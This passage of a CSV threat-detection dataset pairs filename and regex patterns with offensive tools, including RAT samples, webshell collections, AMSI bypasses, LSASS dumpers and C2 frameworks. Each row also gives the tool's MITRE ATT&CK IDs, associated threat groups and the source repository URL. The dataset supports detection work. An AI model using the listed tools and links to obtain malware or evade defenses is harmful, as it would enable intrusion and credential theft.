tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","13870" "*\ADSyncDecrypt\*",".{0,1000}\\ADSyncDecrypt\\.{0,1000}","offensive_tool_keyword","ADSyncDecrypt","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13871" 
"*\ADSyncDecrypt\*",".{0,1000}\\ADSyncDecrypt\\.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13872" "*\Adzok_Open_v*.jar*",".{0,1000}\\Adzok_Open_v.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","Adzok","RAT tool - a variant of Adwind abused by TA","T1219 - T1105 - T1027 - T1059 - T1204","TA0011 - TA0005 - TA0002 - TA0008","N/A","Packrat","Malware","https://sourceforge.net/projects/adzok/files/Adzok_Open_v1.0.0.2.jar/download","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A","13882" "*\AES_cryptor.py *",".{0,1000}\\AES_cryptor\.py\s.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","13887" "*\agent.exe --connect *",".{0,1000}\\agent\.exe\s\-\-connect\s.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","13888" "*\agent.exe"" --connect *",".{0,1000}\\agent\.exe\""\s\-\-connect\s.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - 
T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","13889" "*\agent_exe.exe*",".{0,1000}\\agent_exe\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","13890" "*\aggressor/spoolsystem.cna*",".{0,1000}\\aggressor\/spoolsystem\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","13891" "*\AKID-RATV04.exe*",".{0,1000}\\AKID\-RATV04\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13895" "*\akira_readme.txt*",".{0,1000}\\akira_readme\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection 
patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13896" "*\alan.log*",".{0,1000}\\alan\.log.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","13897" "*\Alan.v*.zip*",".{0,1000}\\Alan\.v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","13898" "*\Alcatraz.exe*",".{0,1000}\\Alcatraz\.exe.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","13899" "*\All_attack.txt*",".{0,1000}\\All_attack\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","13900" "*\all_in_one_enum.ps1*",".{0,1000}\\all_in_one_enum\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - 
TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","13901" "*\alphv1.txt*",".{0,1000}\\alphv1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13905" "*\alphv2.txt*",".{0,1000}\\alphv2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13906" "*\alphv3.txt*",".{0,1000}\\alphv3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13907" "*\AlwaysInstallElevated.cs*",".{0,1000}\\AlwaysInstallElevated\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","13908" "*\Amnesiac.ps1*",".{0,1000}\\Amnesiac\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13910" "*\Amnesiac-main\*",".{0,1000}\\Amnesiac\-main\\.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13911" "*\amsi\dll.zip*",".{0,1000}\\amsi\\dll\.zip.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","13919" "*\amsi\hook-win32.dll*",".{0,1000}\\amsi\\hook\-win32\.dll.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - 
TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","13920" "*\amsi\hook-win64.dll*",".{0,1000}\\amsi\\hook\-win64\.dll.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","13921" "*\amsi_bypass.rs*",".{0,1000}\\amsi_bypass\.rs.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","13922" "*\AmsiBypass.*",".{0,1000}\\AmsiBypass\..{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","13923" "*\amsikiller.py*",".{0,1000}\\amsikiller\.py.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","13924" "*\AMSIPatcher.cs*",".{0,1000}\\AMSIPatcher\.cs.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 
4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","0","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","13925" "*\AmsiProvider.cpp*",".{0,1000}\\AmsiProvider\.cpp.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","13926" "*\AmsiProvider.sln*",".{0,1000}\\AmsiProvider\.sln.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","13927" "*\AMSI-Provider-main*",".{0,1000}\\AMSI\-Provider\-main.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","13928" "*\AmsiTrigger.csproj*",".{0,1000}\\AmsiTrigger\.csproj.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","13929" "*\AmsiTrigger.pdb*",".{0,1000}\\AmsiTrigger\.pdb.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","13930" "*\AmsiTrigger.sln*",".{0,1000}\\AmsiTrigger\.sln.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","13931" "*\AMSITrigger\*",".{0,1000}\\AMSITrigger\\.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","13932" "*\AMSITrigger-master*",".{0,1000}\\AMSITrigger\-master.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","13933" "*\amsiwala.exe*",".{0,1000}\\amsiwala\.exe.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","13934" "*\Andrew.dmp*",".{0,1000}\\Andrew\.dmp.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","0","N/A","N/A","10","4","386","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z","13935" "*\AndroRat Binder.exe*",".{0,1000}\\AndroRat\sBinder\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - 
TA0005 - TA0007","N/A","QUILTED TIGER","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13936" "*\Ani-Shell.php*",".{0,1000}\\Ani\-Shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","13938" "*\Annoying.exe*",".{0,1000}\\Annoying\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13939" "*\Annoying1.exe*",".{0,1000}\\Annoying1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13940" "*\anonymous rat v1.0.exe*",".{0,1000}\\anonymous\srat\sv1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13941" "*\Ant Attack.exe*",".{0,1000}\\Ant\sAttack\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13942" "*\anti_analysis.exe*",".{0,1000}\\anti_analysis\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","13943" "*\anti_debug.exe*",".{0,1000}\\anti_debug\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","13944" "*\anti_methods\antivm.ps1*",".{0,1000}\\anti_methods\\antivm\.ps1.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","13945" "*\Antichat Shell 
v1.3.php*",".{0,1000}\\Antichat\sShell\sv1\.3\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","13946" "*\antiDefense.cpp*",".{0,1000}\\antiDefense\.cpp.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","13947" "*\AntiSandbox.go*",".{0,1000}\\AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","0","N/A","N/A","10","","N/A","","","","13948" "*\AntiSandbox.go*",".{0,1000}\\AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","N/A","10","","N/A","","","","13949" "*\AntiTamper.exe*",".{0,1000}\\AntiTamper\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","13950" "*\AntSword_*.php*",".{0,1000}\\AntSword_.{0,1000}\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - 
T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","13951" "*\AoratosWin*",".{0,1000}\\AoratosWin.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","13969" "*\APC_Injection.cpp*",".{0,1000}\\APC_Injection\.cpp.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","13970" "*\apc_injection.exe*",".{0,1000}\\apc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","13971" "*\APCLdr.*",".{0,1000}\\APCLdr\..{0,1000}","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","0","N/A","N/A","N/A","4","316","54","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z","13972" 
"*\api_hooking.exe*",".{0,1000}\\api_hooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","13974" "*\Apollo.exe*",".{0,1000}\\Apollo\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","13975" "*\Appdata\*\aloy64.exe*",".{0,1000}\\Appdata\\.{0,1000}\\aloy64\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","13976" "*\Appdata\*\Beacon.exe*",".{0,1000}\\Appdata\\.{0,1000}\\Beacon\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","13977" "*\Appdata\*\Beacon01.exe*",".{0,1000}\\Appdata\\.{0,1000}\\Beacon01\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","13978" 
"*\Appdata\*\Beacon02.exe*",".{0,1000}\\Appdata\\.{0,1000}\\Beacon02\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","13979" "*\Appdata\*\kitty.exe*",".{0,1000}\\Appdata\\.{0,1000}\\kitty\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","13980" "*\AppData\Local\Temp\*\RDP\Result\Pass1.txt*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\RDP\\Result\\Pass1\.txt.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","14005" "*\AppData\Local\Temp\*\RDP\Result\Pass2.txt*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\RDP\\Result\\Pass2\.txt.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for 